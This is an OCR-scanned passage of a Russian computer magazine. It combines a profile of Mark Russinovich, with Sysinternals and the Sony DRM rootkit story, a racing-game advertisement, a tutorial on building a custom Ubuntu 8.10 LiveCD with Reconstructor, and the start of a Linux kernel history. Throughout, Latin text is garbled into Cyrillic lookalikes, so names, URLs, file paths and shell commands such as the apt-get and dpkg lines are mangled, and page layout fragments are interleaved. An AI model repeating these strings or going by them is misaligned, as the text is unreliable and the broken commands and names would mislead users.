ѴѴіпІегпаІзЗоІІѵѵаге. После совершения сделки праздникжизни на 
Зузіпіегпаіз немного сбавил обороты. Например, с сайта исчез соре код, 
ранее свободно публиковавшийся для многих софтин, пропали версии 
для Ыпих, — и сразу же были удалены утилиты вроде N7 Соскзппкб, 
позволявшей восстановить парольотсистемы практически в любых 
условиях. В остальном, МісгозоІІ не имели никаких возражений против 
существования сайта и методов распространения ПО. Во всяком случае, 
сразу после слияния Руссинович заверил публику, что Зузіпіегпаіз 
продолжит работать «почти как обычно». 

В Міегозоб: Марк получил гордое звание Тесбпісаі РеЕоѵѵ, что, по сути, 
означает члена технического совета корпорации. Эту должность он 
занимает по сей день, трудясь на благо подразделения платформ и 
служб (РІаІІогт апб Эегѵісез Віѵізіоп). На новом месте в обязанности 



» с 







Руссинович частый гость на различных форумах и конференциях 




Глядя на это, понимаешь — хорошо быть Кевином Роузом! :) 



Руссиновича вошли работа над проблемой обнаружения руткитов и 
создание для этого соответствующих средств, а также разработка утилит 
для ликвидации всевозможных таіѵѵаге-программ. Можно сказать, что 
Марк Руссинович еще с 2006 года стоит на страже наших компов :). 



ПОПУЛЯРНОСТЬ 



Тот фа кт, что сегодня Марк за ни мается именно вопросами руткитов, 
довольно любопытен, потому как широкие массы познакомилисьс 
самим словом «руткит» во многом благодаря нему. Произошло это в 2005 
году, еще до перехода Руссиновича в МісгозоИ Тогда наш герой, в ходе 
тестирования своего детища с говорящим названием РооІкііРеѵеаІег, 
обнаружил, что на его собственном компьютере происходит некая подоз- 
рительная активность. Искреннеудивленный, Маркпозже писал в своем 
блоге: «Учитывая, что я весьма осторожен при использовании интернета 
и софт уста на вливаю только из надежных источников, я понятия не имел, 
где мог подцепить настоящий руткит, и если бы не подозрительные 
названия файлов, я грешил бы на ошибки в коде РКР». 

Однако дело оказалось не в ошибках РооІкТРеѵеаІег’а, а в лицензи- 
онном диске от компании 5опу ВМ6 Мизіе Епіегіаіпппепі;, который 
Руссинович незадолго до этого приобрел на Атагоп.сот. Интернет- 
магазин честно предупреждал о том, что диск защищен от копирования 
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НКІМѴЗузІетѴСиггепЮопІгоІБеЛЗаІеВооІ.то есть продолжал функци- 
онировать даже в безопасном режиме. Возмущенный до глубины души 
Руссинович, конечно, в итоге, сумел совладать с заразой, ноумалчивать 
об этом эпизоде не стал, подробно описав случившееся в своем блоге. 
ІТ-сообщество всколыхнулось, и уже через считанные часы эту инфор- 
мацию подхватила половина интернета, а затем и ведущие СМИ. Позже 
он в качестве эксперта выступал на судебном процессе против 5опу, 
давал многочисленные интервью и комментарии прессе, и, в целом, 
привлеккэтой проблеме повышенное внимание. Массы, благодаря ин- 
циденту, узнали, чтотакое «руткит» и насколько это плохо, а также узнали 
о существовании такого человека, как Марк Руссинович. Получилось, 
что Марк, неожиданно даже для самого себя, прославился. 

Еще одна испостись Руссиновича, принесшая ему определенную 
известность — писатель. Помимо прочего, Маркявляется соавтором не- 
скольких книг, включая такой бестселлер как МісгозоІІ; ѴѴіпсІоѵѵз Іпіегпаіз 
(«Внутренняя структура ОС МісгозоІІ; ѴѴіпсІоѵѵз»). Он написал множество 
самых разных статей и мануалов, на регулярной основе сотрудничая 
с журналами ТесбМеІ: Мадагіпе и ѴѴіпбоѵѵз ІТ Рго (бывший ѴѴіпбоѵѵз N7 
Мадагіпе). Плюс ко всему, Руссинович продолжает вести блог, найти 
который можно по ссылке Ьир://Ыоа5.1есЬпе7сот/МагкРи55ІпоѵісЬ . 
а по адресу ЬіІр://Ыод5.І:есЬпе7сопп/ппагк гиззіпоѵісЬ располагается 
его русскоязычное зеркало. Вотуже третий год блог Марка удерживает 

позиции одного ИЗТОПОВЫХ блогов среди сотрудников МІСГ030І7 
Из всего этого ясно, что стаким экспертом, как господин Руссинович, 
интересно было бы поговорить. Узнать, например, его мнение о над- 
вигающейся ѴѴіпбоѵѵз 7 и ее безопасности, или о том, какие наработки 
есть у бывших сотрудников ѴѴіпІегпаІз для новой ОС. Именно интер- 
вью должно было ожидать тебя в конце статьи. К сожалению, Марк 
Руссинович сначала любезно согласился ответить на наши вопросы, а 
потом, очевидно, передумал и теперь, уже на протяжении нескольких 
недель, хранитзагадочное молчание. Что ж, может быть дело в плот- 
ном рабочем графике, или в том, что он не имеет права давать ком- 



ШтваПТесНМе^ 



5унІп!етаІ5 



сгрвницэ 







&и6лнотеісл I Обучение н сертификация I Файлы для игрузкн 



Что но«опо I В4Б'Тр«нсмини Журнал Р1и< 



^ версий для лечатч ^ Отправить 



Щелкните^ чтобы еиениіъ и отпрэБнть отаыв 



Сервисные л|хігранны 

ВсаОлужебше прсгрімш 
§у$л№гпа1$ 



Средстм иля работы С 
сетьч? 

Служабте пропраимгі 
лроцасой 

Служабша прОфй>т 
6а зосіаснйсть 

сеадажйосистаічс 



ДОЛОЛНКТЁЛѢНЫЁ 

ресурсы 



Епог ум» ^ѴЯІПІ«Ѵ»ІС 
Еіібямте^ Еу<іп№іги^ 
Об уча»» 5ѵ5ійЕ«Т»І5 
Еа&-тр№сл»4тт Нарка 
мерйпрііатнй Марка 



ѴѴіпсІоѵѵ5'5у5іп1:егпаІ5 



Баб-уэег) Буііплетаіі был соглан 9 1БЭ6 г. Нзркон руссинсвичан (Мвгк йц$5іп5ѵіеЬЗ и ерюсом когс99ллаи (вгусе сс^иеіі) 
для рознешяиня срзпвниых ими ѵшвсршенствѵннмых сервнснык првграгми н технической инфориеини. В ичміе 2006 г. 

корсѵрраикія МісгрзрА лрирбрелв кРипанню Бу^кНептвІ^:. Сервисные орйфениы поиРСйіРТ как спеичвлистан по 

чнфорнешсрииым техирлогивиі так н рирвботчикэч упрввлятъ^ иэходить и устрэните иенспрввнрсш н выполнятъ дчагиротнку 
лрн/ккжепий и олервиионпых оисген При лвличин вопросов о квюон-лнбо ннсгруяенте или его нспольловвніік можно 

воспрльзоевтъся форумом БуЕІтегпзІі Гогигпі чтобы получитъ ответы и лоношь других лользоветелей и нодернторовіо 



избранные ресурсы 






Слукгебпые прогрепиы дли работы с 
файла ни и диска ни 
Служебные програнны для просмотра и 
наблюдения за доступом к файлам и диошн и их 



Сати 

1 1 Иноруманты длй сети: от мониторов подключеннн 
до акалнэатороа быолэсиостн ресурсов- 



.Д 3 ^ Процессы и потоки 

Сервисные программы, позволяющие заглянуть 
Ш 'под калрт^ и определшъ задачи, выполнл«ные 

тени или иными проиессанн и потреЬляеныв ини 
ресурсы. 



Сервисные програниы снстены безоласиости 
Сервисные лрогрвнны для настройки и 
управления системой безопасности, в той числе 
средства обнаружения гооікіі: и охотники за 
прогрвннвии 'Шпионами- 

Сведений о снстене 

сервисные програнны для просмотра и настройки 
нсполіэзования системных ресурсов- 

Разное 

Собрание разнообразных сервисных прогрвнн, а 
тон числе застаеох, средств лрсдсгввления и 



Трр и> ОожпІоаіІЕ 
< ргосе$5 Ехріогег 

• Аиіоіііипз 

• Ргосе&з Мопі^ог 
» РвТооГз 

» Рв^еОеГгвэ 

■ йооікітеѵеа)ег 

■ ТфѴіеиг 

• ВрІпЬ 

■ в^иеБС('ее[1 



5ОІЦ4І0П АссеІегЫогБ 

* ЗоІиЬіоп Ассеіегвіогв Ноте 
- зоІоЬоп Ассйіегагогв Р&г 

Рагіпег5 

* ІпГгазЬгисЮге Иаппіпд апгі 
Ое$іагі 

* ЗЬагеРоііпЬ Сервер РГаппіор 
Тооі 

* 2007 Міегозоі^ ОНГісе Зесогйу 
Сиісіе 

* міегофП; А5^$тел« апіі 



СайтЗузіпІегпаІз работает и сегодня 



средствами ОПМ (Оідкаі гідЫ:з тападетепі:), но не сообщал, какими 
конкретно. Пришлось проводить самостоятельное расследование, в 
ходе которого и стало ясно, что 5опу переходит все грани разумного, а 
удалить руткит иначе как вручную невозможно — он забрался даже в 



ментарии и разглашать некоторую информацию, являясь сотрудником 
МІСГ050І7 Как бы там ни было, одно мы можем сказать точно — если 
нам все же удастся получить ответы, мы обязательно опубликуем их в 
ближайшем номере. 
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Многочиоіенкые призы 
от АІрте 



Ыах\ [^асіпд - зто виртуальный мир гонок на твоем компьютере! 

Хочешь обладать самым крутым гоночным автомобилем? Значит - Махі І^аопд для тебя! 

В игре у тебя еаь возможность купить авто, доработать его по полной и продать дороже, 
а на вырученные деньги купить новую тачку, ещё круче. Но самое главное: побеждаешь в 
игре ■ побеждаешь в реальности! Каждый месяц новые призы! Ты можешь выиграть 
компонентьЕ Саг Аисііо & МоЬіІе Месііа от АІріпе, страховку РОСНО на свое авто. 

А а конце года лучший получит реальный автомобиль - ОреІ Сог^аІ 



МАХІ пАСIN<з. ИГРАЙ И ВЫИГРЫВАЙ! 

Все подробности игры на сайте ѵѵѵѵѵѵ.ппахі-гасіпд:ги и ѵтоѵѵ.такі-іипіпд.ги 



РОСНО 



твп 






Реклама 



в составе АІІІаш; ® 









1ЕНИС КОЛИСНИЧЕНКОІ 



Констрѵ кто 
для туксаІ! 



|В Сети можно найти множество инструментов, позволяющих за считанные 



асы подготовить свой дистрибутив. Что потом с ним делать — решать тебе 



^аіс минимум, создать сборку, содержащую все необходимые пакеты 



Юна пригодится при переустановке системы или при установке на другой 



Іішмпьютер^ А если требуется установить дистрибутав на целый парк ком 



пьютеров, то такой диск — просто находка 



ПОШАГОВОЕ РУКОВОДСТВО ПО СОЗДАНИЮ 



СВОЕГО ДИСТРИБУТИВА НА БАЗЕ ЦВЦМТЦ 8.10! 




□ ЛЯ создания дистрибутива нам понадобятся: 

• Пакет Ресоп5Ігис1ог [ есопзіг гапбз.сот ). 

• 150-образ дистрибутива ІІЬипІи [ ѵѵѵѵѵѵ.иЬипІи.сопп ). 

• Примерно 6 Гб свободного места на Ыпих-разделе. 

Нужно сделать несколько замечаний относительно первого пункта. 

Пакет РесопзІгисЬг позволяет разобрать 150-образ ОЬипІи, внести 
изменения и заново собрать исошник. Официально, текущая версия (2.8) 
поддерживаетдистрибутив Нагбуто есть предыдущую версию Обопри. 
Как выяснилось, эта версия реконструктора отлично работаете Іпігеріб 
ІЬех (Обопри 8.10), что и будет показано в статье. 

По поводу места на диске — минимум 6 Гб, поскольку в разобранном 
состоянии ЫѵеСО с ОбипШ занимает при мерно5Гб + необходимо место 
для образа нашего дистрибутива (около 700 Мб). Самое время удалить 
все ненужное, если места не хватает. 



Н ЗАПУСК РЕКОНСТРУКТОРА 

Итак, устанавливаем и запускаем Реконструктор (он появится в меню 
«Приложения»). Программа запроситпарольдля зибо. Введи свой па- 
роль (именно свой, а не гооГа). Далее нажимаем Мех! и выбираем, какой 



дискхотим создать — ЫѵеСО или инсталляционный. Нужно выбрать 
первое. Хотя мы создаем ЫѵеСО, на диск будет помещен инсталлятор, 
поэтому при необходимости дистрибутив можно установить на жесткий 
диск, как полноценный ОбипШ. 

Затем нужно указать, куда будет «распакован» исходный 150-образ 
ОбипШ и где брать этот самый образ. Винту меня не резиновый, поэтому 
исходный образ я поместил на ѴѴіпбоѵѵз-раздел, чем сэкономил 700 Мб 
на втором Ыпих-разделе (у меня он занимает 6 Гб — пришлось даже 
ореп505Е снести). Можешь использовать мойтрюкдля экономии места. 
В крайнем случае, в привод можно вставить ЫѵеСО ПбипШ — программа 
без проблем его найдет (но в этом случае распаковка займет больше вре- 
мени). Таккаквее действия выполняются отимени гооГ беспокоиться о 
правах не нужно. 

Внимание! При первом «разборе» ЫѵеСО обязательно включи парамет- 
ры Сгеаіе Ветазіег ОігесЬгу, Сгеаіе Вооі Оігесіогу, Сгеаіе Іпібаі Ватбізк 
Оігесіогу. Собственно, реконструктор и не позволит продолжить работу 
без включения этих параметров. Во второй и последующих сборках их 
включать не нужно, поскольку Реконструктор перезапишет все измене- 
ния, которые были внесены в файловую системудистрибутива (графи- 
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ипіхоі(і 



г □ п !і [ гис ^ ог 



РІеа&с ^еІссЕ іЬс Іуре оі сЛ^с уои Ііке Іо сге>аіс. ^аісс! 
^Iѵе ^0 сг&аЕе ап і>Ьипіи Оаікійр І_гѵе СО. 5&1есі АІЕёгпаЕ& 
Ю ЕГааІЁ ап«!І иЬипЕи АІІЁгпаЕЁі Еп^ЕаІІ СО. 



■р О 

ЫѵЕ СО 



ПесогіЪТГиЕіЕог 






?Ьі5 улІІ сгеаЕе з сиьіот е<ІѴі^огкіпд сІігесЕогу. 

I? іНе Ьохо5 аге сН&ск&ЕІ, сІіг&сЕогі&8 міІІ Ье оѵегѴіТіЕЕеп. 



Та квЕр ехІЕІіпд жогкіпд сІігесІогІЕБ, ипсЬеск кЬв Ьокез. 



• о&іілор (і_»ѵе СО) 
АІЕегпате ЕіпвіэІІ со) 



■уЛЕгкіпд □ігесЕогуі /пп&ЕЛа/сІічк/ІіѵвсЕІ 
•і Сгеаіе йета&Еег Оігесіогу (гпиэЕ е)о ат Іеэ5і опсе) 

^ Сгеаке йооі(сіі9Еот) ОігесЕогу {глиаг і^о аг ІеааЕ опсеУ 

Сгеаке Іпгігаі йатціі'эк (шгЕгсІІ Оігескагу (ти^і; сіо ак Іеэ5і опсе) 



гогсдвіошігірд іпіегеі 



ге [^1аЛЛР€0/0 Ѵітіаа йэ/^ЬипЕи-Э . 1 0-тіев ІсЕрр-і 306 .^50 

Чоіі сап ІеаѵЕ кИе 150 РіРепате Ыапк. 
ат;^ и^е а ЦиЕ СО Iп^ІЕас^. 




ческиетемы, файлы конфигурации, установленные пакеты 
и т.д.) После этого программа сообщит, что нужно немного 
подождать. Ждем-с. Время ожидания зависиттолько от 
умений и навыковтвоего компьютера. В среднем, понадо- 
бится минут5-10. 

Н ПАРАМЕТРЫ ЗАГРУЗЧИКА 

После распаковки образа откроется основное окно Реконс- 
труктора, состоящее из пяти вкладок. Начнем модификацию 
исходного дистрибутива с вкладки Вооі: Зсгееп. Параметр 
Ыѵе СВ ЗрІазЬ задает фон загрузчика 6РВВ. Создатьего 
можно в ОІМР. Формат файла: РСХ, индексированный, 256 
цветов, размер 640x480 или 800x600. Ыѵе СВ Техі; Соіог 

— цветтекста меню загрузчика 6РВВ. У меня белый фон для 
6РВВ, поэтому цветтекста я выбрал черный. 

Во время загрузки ВЬипІи можно увидеть индикатор загруз- 
ки, именно он и задается параметром ВрзІазЬ Рііепате. 
Готовые 50-файлы скачай на сайте дпоте-іоок.ого . а еще 
лучше — создай собственный. Запусти 61 МР, нарисуй любое 
изображение, сохрани в формате РМ6 (размер 640x480, 
800x600 или выше, индексированное, не более 256 цветов) 
и нажми кнопку бепегаіе. Выбери свой РМб-файл, по нему 
программа создаст 50-файл, который и нужно будетуказать 
в поле ВзрІазЬ Рііепате. 

Тут есть один нюанс. С ним я столкнулся, когда сделал 
несколько сборок дистрибутива. Лучше подготовить два 
ВзрІазЬ. Первый — с разрешением 640x480, а второй 

— 800x600. Первый нужно установить как ВзрІазЬ для 
ЫѵеСВ, а второй как ВзрІазЬ для дистрибутива. Практика 
показала, что, если установить ирзІазЬ размером 800x600 
или выше, он вообще не отображается при запуске иѵеСВ. 
Зато отлично будет выглядеть при запуске системы! Имей 
в виду, при старте РіѵеСВ пользователи увидят созданный 
тобой бзрІазЬ, а после инсталляции будет использоваться 
стандартный берІазЬ бЬипШ. Это не есть хорошо: если мы 
собралисьделатьсвой дистрибутив — нужно держать 
марку и по возможности стараться, чтобы меньше мелька- 
ло слово «иЬипІи». Отом, какустановить свой бзрІазЬ, я 
расскажу дальше. 

Н ПАРАМЕТРЫ ГНОМА— ВКЛАДКА 6Ы0МЕ 

В группе Родіп указывается бОМ-тема (6М0МЕ Оізріау 
Мападег). Она будет использоваться для оформления 
окна входа в систему. Если леньзаморачиваться с со- 
зданием своей графической темы, можно использовать 
уже готовую. Скачай понравившуюся с дпоте-іоок.огд . 
нажми кнопку выбора (...), после чего установленная тема 
появится в списке, и ее можно будет выбрать. 

ЗрІазЬ Зсгееп — это экран, который пользовательувидит 
при загрузке Гнома. Опять-таки, его можно скачать с 



Откуда брать образ и куда его распаковывать' 



дпоте-іоок, можно создать свой, а можно вообще нетро- 
гать(ятаки поступил: изменил только фон Гнома по дефолту, 
Васкдгоипб СоЬг). 

В группе ВезкЬр можно выбратьобои поумолчанию иус- 
тановить шрифты Гнома, а в группе ТЬете — цветовую тему, 
тему для оформления окон и набор пиктограмм. 

Н ВКЛАДКИ АРТ И ОРТІМІ2АТІОЫ 

На вкладке Ар! задаются репозитории, которые будут 
доступны новому дистрибутиву. Поскольку своих репоу меня 
нет, то и выбирать нечего. А вот с оптимизацией осторож- 
нее. Дело в том, что эта версия Реконструктора рассчитана 
на ОЬипІи 8.04, и неизвестно, что она сотворитсо скриптами 
инициализации НЬипІи 8.10. Экспериментировать я пока не 
стал (хотя обязательно попробую), поэтому сразу с вкладки 
ОрОтігаОоп переходим на вкладку ЕіѵеСВ. 

Здесь можноуказать имя машины, имя пользователя ЕіѵеСВ 
и задать пароль (раз собираешьдистрибутив для себя 
любимого). Если нужно просто изменить имя пользователя 
поумолчанию, я расскажу, какэто сделать с помощью кон- 
фигурационных файлов, но чуть позже. 

Теперь самое интересное. На вкладке Мобиіезты можешь 
выбрать модули. Модули выполняют некие действия, напри- 
мер — «удалить ОІМР или ОрепОіТсе для экономии места». 
Также есть модули для установки МРІауег, ГІазЬ-модуля для 
ГігеФх. Их можно запускать сразу (Ехесиіе) или же при за- 
грузке (Рип оп Ьооі:). Так, еслиты хочешь добавить МРІауег 
в свой дистрибутив, выбери модуль МРІауег как Ехесиіе и 
нажми Арріу. Не забывай посматривать в сторону верхнего 
правого угла окна —там указывается предполагаемый раз- 
мер образа (Езбтаіеб 150 5І2е). В моем случае программа 
насчитала 702 Мб, а при создании образа вышло 745 Мб. 
Если нужноустановитьдополнительные пакеты, укажи их в 




> Ііпкз 

• Сайт проекта Вепіх: 
бепіх.бкѵѵз.огд.иа . 

• Всевозможные 
ресурсы для тво- 
его дистрибутива: 
дпоте-іоок.огд . 

• «Собери свой 
ОЬипІи» (А. Федор- 
чук) — информация 
для размышления: 
сіІкіЕги/агІісІез/222 . 



[Вкладка Вооі5сгееп| 



0і Йесопйігисюг _ х 

Си5(отігаІіоп {ОрІіоПаІ) 

ЫЬилШ Сіѵе СО Ѵегзіог: ВЛО 

ЕбЕітаіесІ 150 5гге; ~ 673 М8 

ВооЕ Зсгееп Споте АрГ □ріітігаііоп І_іѵе СО Мосіиіе? 

Ііѵе СО ЗрІа^Ь: /Ьоте/{^епІ5/Ііѵесіі_5рІа5Н.рсх 

Ьл/е СО Техі Со^ог; 

и^рі а Б Ь Р^ііепаппе : /Нете/с^епіБ./ І/іпГге р \ё .5о 

Моіе: ТЫб ^|1 серіасе ЬаіН Ще Уѵе СО 
^рІа&Ь апсі іНе іл5.І:еІІесІ ітаде. 

и5.рІа5Ь ОепегаЕоп 

Моіе: Оаррег: ТГе ітаде ти5І Ье а .рпд ап^ тизі 
Ье 6^0x400 агкі 16 С0І0Г5 (ігкіехесі). Есіду; тЬе ігпаде 
тийЕ Ье а .рпд апсі по тоге Щэп 256 соіогй 

1 Нр ЬгіПІ 'ліЛ Ьр ЬГдгк 




ХАКЕР 03 /123/ 09 



► 081 




□епіх 



Си&С.оглііі’лЕГоп (Орііопзі) 
иЬцспіи Іга^ СР Ѵі^гіюп; в.ш 



уЬушм Иѵч- СР ѴІРГ 



ВООЕ ЕіГС^П ОПОГПЕ 



Ѳаог 5сге«п Слате Арг Орі тпігліівіп іллСР Но(ГиГе5 



ЕкЁ-сиІв ПлП йП ЬаЁІ Ріеі^иіе 



Мйі^иій ^/ьгаіап АілНйГ 



Сшій^йгу 

$нЛмагч 

> А^ГПіПіЗІТВСійП 
Е^и^аНоп 
^ С^врЬісз 
^ МіісеІІапеоиі 



ПбоЕ ЬРдіп 



ЗрІзвЬ 5спесі 



Рв^кіор 



Й1»5;ог»йгу< 



Мсапагги' 



НесапгЯпіі 



^ РІидші 
^ РгаАлЕгѵЧу 
> 5еіѴімі 



Раьй ор РопЕ; 



Силргл лрІ-дяЕ [гятілчі: 



# '^'рі^аЕе моЕІиІв 



СЕеат вааЕ Мосіиіеі 



ное ЧИСЛО цветов па- 
литры — 256. Сохрани 
изображение как 
РМб-файл. 



• Как быстро создать 
своютему? Скачай 
понравившуюся 
с дпоте-іоок.огд . 
Распакуй архив 
в любой каталог. 
Измени файлы темы: 
графические файлы 
можно редактиро- 
вать в 6ІМР, а файлы 
конфигурации — в 
дебіС Затем запакуй 
все обратно. 



• Для сборки своего 
дистрибутива можно 
использовать СЬип1:и 
Сизіоппігабоп КіД но 
все, что он делает, 
выполнимо и с помо- 
щью Реконструктора. 
Текущая версия ИСК 
не работаете СЬипІи 
8 . 10 . 



поле Сизіот арі-деі: (іпзІаШ и нажми кнопку Арріу. Пакеты 
нужно перечислить через пробел, например, «пакеті пакет2 
пакетЗ». Количество пакетов не ограничено, однако не 
перестарайся. Установи несколько пакетов (тянутся из ине- 
та), посмотри, насколько увеличился размердиска, потом 
ставь остальные. Аналогично, поле Сизіот арі-деі; (гетоѵе) 
используется для удаления пакетов. 

Если хочешь поковыряться в файловой системе дис- 
трибутива, нажми кнопку «Терминал». После этого ты 
получишь гооі-доступ к файловой системе дистрибу- 
тива и сможешь сотворить с ним все, что угодно. Когда 
нужно подправить конфиг, я предпочитаю другой способ. 
Открой обычный системный терминал (Приложения^ 
Стандартные ^ Терминал), а затем выполни команду 
«зибо тс» для запуска файлового менеджера тс (ведь 
он утебя установлен?) с правами гооЕ Затем перейди в 
каталог, в который был распакован исходный 150. В моем 
случае это /тебіа/бізк/Иѵесб. В нем ты обнаружишь три 
подкаталога — іпТгб (надеюсь, все знают, что это такое?), 
гетазіег (распакованная версия 150), гооі; (корневая ФО 
твоего дистрибутива). 

Что же здесь можно сделать? Можно перейти в каталог 
гетазіег и удалить все *.ехе-файлы и файл аиФгип.іпі. 

Так мы сэкономим 1 ,3 Мб. Немного, но зачем нам лишнее? 
Затем можно открыть файл іпТгб/еІс/сазрег.сопІ и уста- 
новить имя пользователя поумолчанию и строку, которая 
будет выводиться на панели ОМОМЕ (в моем случае — Вепіх 
зеззіоп изег): 



ехрогС ^ЗЕКNАМЕ= "сіепіх" 

ехрогС иЗЕЕЕиЕЕЕАМЕ= "Вепіх зеззіоп изег 

ехрогР НОЗТ= "(іепіх" 

ехрогР ВІЛЕВ_ЗУЗТЕМ= "Вепіх" 



После того, как выполнишь все модификации с файловой 
системой, не забудь нажать кнопку Арріу для пересчета 
размера 150. И смело щелкаем Мехідля продолжения. 



Н ПОДГОТОВКА К СБОРКЕ 150 

Атеперь будь внимателен! Если впервые собираешь свой 
ЕіѵеОВ, убедись, что включены параметры ІпШаІ Ватбізк, 
5диазЬЕ5 ВооЕ Еіѵе 00 (150). А вот если хочешь дорабо- 
тать ЕіѵеОО, который начал делать, скажем, вчера, то эти 
параметры должны быть выключены! Иначе программа 
перезапишет все изменения! 

Еііепате — имя ЕіѵеОО. Проверь, чтоутебя есть место 
на диске (около 750 Мб), в крайнем случае можно создать 
150-образ на другом разделе. ОезсгірОоп — это метка диска. 
Нажимай Мехі: и наслаждайся процессом сборки твоего 
дистрибутива. 



В ТЕСТИРОВАНИЕ 

Запиши 150 на болванку с помощью любой программы 
(например, Него Фг Еіп их) и загрузись с него. О начал а ты 
увидишьустановленныйтобой фон для ОПОВ. Далее — эк- 
ран загрузки системы, а затем — рабочий стол. Можно даже 
попробовать установить дистрибутив на свой компьютер 



X- 



ипіхоіб 



ООМТЬегтіе; І^оіЕів Шг> □гоЫв'5 йОМ ЕЬете 



ВдекйгаипЛ СйІ&г: 



ЖВІІрдрвг: ^отФ/авпіѵДгас! Э фо 



кесоп^ггисіог 



БеІесІ соглропепіз Іо Ьииа 



✓ Іпі^іаІ Г^атаізк (іпіІгсП 



^ БаиазпРЗ ВооІ 



✓ Еіѵе СО !50 



Рііепаппе: /тесІіа/с1І5к/с1епіх|-Ііѵе ,І50 
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Шгпаііѵе зІагТтщэ апсі шзхаіізйоп тойез. 



[Полная русификация — я установил все пакеты локализации 

При установке пакетовтаким способом они снова будутскачаны из ин- 
тернета. Кого-то такой вариантнеустроит— неу всехже безлимитка. Да 
и хотелось бы установить на ЫѵеСП все пакеты, которые уже установлены 
на твоей рабочей системе, чтобы так: установил ПЬипІи, накатил все 
пакеты, потом перенес эти пакеты на ЫѵеСП, и утебя уже есть готовый 
ЫѵеСП со всем необходимым! 

Запускаем дватерминала: первый обычный (Приложения Стандарт- 
ные ^Терминал), а второй — терминал реконфигуратора. В первом тер- 
минале запускаем тс с правами гооі; и переходим в каталоге пакетами 
/ѵаг/сасбе/арДагсЫѵез: 

$ зисіо тс 

На второй панели переходим в каталог/тебіа/бізк/бѵесб/гооі; — это 
корневая файловая система нашего ЫѵеСП. Создаем каталогбеЬ и копи- 
руем в него все пакеты из/ѵаг/сасбе/арі/агсЫѵез: 

$ тксііг йеЬ 

$ ср /ѵаг/сасЫе/арС/агсЫіѵез/* . йеЬ /тесііа/сіізк/ііѵессі/ 
гоок/сіеЬ 

Осталосьтолько установить их в нашем ЫѵеСП. Отправляемся во второй 
терминал и вводим: 

$ ссі (іеЬ 

$ сіркд — і * . сіеЬ 
$ гт * . сіеЬ 
$ ехік 

Первая команда переходит в каталог беЬ, содержащий пакеты, вторая 
— устанавливает пакеты. О разрешении зависимостей можно не беспо- 
коиться: тут есть все нужные пакеты, они проинсталлированы в нашей 
системе, а приустановке были разрешены любыезависимости! Третья 
команда удаляетбеЬ-пакеты — они нам больше нетребуются, а дублиро- 
вать их на ЫѵеСП нетсмысла. Последняя команда закрываеттерминал. 
Реконфигуратор пересчитает размер образа —ты увидишь его в верхнем 
правом углу программы. Посмотри, может, ты переборщил! 

По собственному опыту могу сказать следующее: если удалить из ЫѵеСП 
ОрепОЫсе и СІМР, а вместо нихустановить пакеты локализации, кодеки 
и МРІауег, то дистрибутив поместится на СП. Размеробраза будетпри- 
мерно 695 Мб. А вот если ничего не удалять, то записать образ получится 
только на ПѴП. Дистрибутив Пепіх 0.5 РиЦ занимает 981 Мб. Я заменил 
родной ОрепОЫсе 2.4 на ОрепОі'Рсе 3.0 Рго от ИнфраРесурс и установил 
пакеты локализации, кодеки, МРІауег, ТбипбегЬігб, РРе^Ыа. Догадыва- 
юсь, какой вопрос ты хочешь задать. А можно ли СП-образ, созданный 
программой, записать на ПѴП? Да, проверено, — работает!^-^ 



— установка пройдет без особых проблем. После перезагрузки увидишь 
установленную тобой СПМ-тему. 



Н ЗАЙМЕМСЯ КАСТОМИЗАЦИЕЙ 

Поздравляютебя с первой сборкой! Но еще нужно поработать напиль- 
ником, ведь: 

• При загрузке системы (после установки на жесткий диск) отображается 
Пзріазб ПЬипЫ, а не нашего дистрибутива; 

• В каталоге Ехатріез на рабочем столе до сих пор стандартные приме- 
ры ПЬипШ; 

• При запуске 6М0МЕ пользователи слышатзвукПЬипЫ; 

• Состав программного обеспечения остался прежним. 
Вначалеустановим Пзріазб для твоего дистрибутива. Откройтерминал и 
выполни команду «зибо тс». Теперь нужно перейти в каталог, где находится 
файловая система нашего дистрибутива. Посколькуя распаковал образ в 
/тебіа/бІ5кДіѵесб,тотаким каталогом у меня был/тебіа/бізкЛіѵесб/гооТ 
Перейди в каталог/изгДіЬ/изрІазб своего ЫѵеСП (то есть, это будет/тебіа/ 
бізкДіѵесб/гооДизгДіЬ/изрІазб). В нем как раз и хранятся 50-файлы Пзріазб. 
Ведьты уже создал ПзрІазЬ-файл с разрешением 800x600? Скопируй его на 
место изрІазб-бзете-иЬипЫ.зо. Конечно, можно поковыряться в конфигах 
изрІазЬ и прописать собственный файл безудаления оригинального, но 
так намного быстрее. Ктомуже, сгенерированный Реконструктором файл 
занимает всего 400 Кб, а оригинальный — 2 Мб. Займемся примерами. Пе- 
рейди в каталог/изг/збаге/ехатріе-сопіепі; своего ЫѵеСП (/тебіа/бізк/ 
[іѵесб/гооДизг/збаге/ехатрІе-сопІепІ:). Удали все, что там есть, и заполни 
своим содержимым. А можно вообще ничем не заполнять — в этом случае 
ты просто сэкономишь пользователю место на диске. Можно поместить 
туда сценарии для установки дополнительных пакетов. В общем, все 
зависит от полета твоей фантазии. Итак, изріазб установили, примеры 

— почистили. Теперьзвук. Нужно найти подходящий файл в формате 066 
(или же сконвертировать образец из любого другого формата в формат 
066 программой оддепс) и поместитьего в каталог/изг/збаге/зоипбз. 

Тут уж решать тебе — либо создавать свою собственную тему по образу 

и подобию размещенной в каталоге/изг/збаге/зоипбз/иЬипШ, либо 
просто скопировать подготовленный 066-файл в безкЬр-Ыдіп.одд 

— этозвук, воспроизводимый при входевОМОМЕ. Можноещезаменить 
звук, воспроизводимый при выходе из 6М0МЕ — безкЬр-ЫдоиТодд. 
Идем дальше! Нужно установить пакеты, и здесь нам понадобится другой 
терминал — тот, который запускается Реконструктором. Открываем его 
нажатием кнопки Тегтіпаі и вводим команды: 



$ зисіо арк-деС іпзкаіі <список_пакетов> 
$ зисіо арк-дек гетоѵе <список_пакетов> 



Очевидно, первая команда используется для установки пакетов, а вто- 
рая — дляудаления. 



кіепі 



іпустить Репіх без установки на компьютер 



ил. 



Поддержка 

сікшз.огд.иа 



4 Програмиироплиио 
I Специальные ваімэ>иносги 



? ОрепОЖсе огд 3.0 Ва$е 
1 ОрепОНіее огд Э п г 
1 ОрепОЖсе огд 3 0 Огам 
1 ОрепО№се огд 3 0 ітрге» 

1 орепОЯісе огд 3 О МаіЬ 
. ^ ОрепО№с« огд 3 О Ѵ»Ліг 

^ ОрепО№се огд Э О Управление принтером 
V Словарь 

Электронная почта и календарь Еѵоіідюп 
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[пополняемы й д есятками новых интереснейших наработ ок. Не стали исклю- 
іением и последние два года.І 




г 2007 год. ВЕРСИИ 2.6.20-2.6.23 

Версия 2.6.20 получаетбазовую поддержку паравиртуализации, реа- 
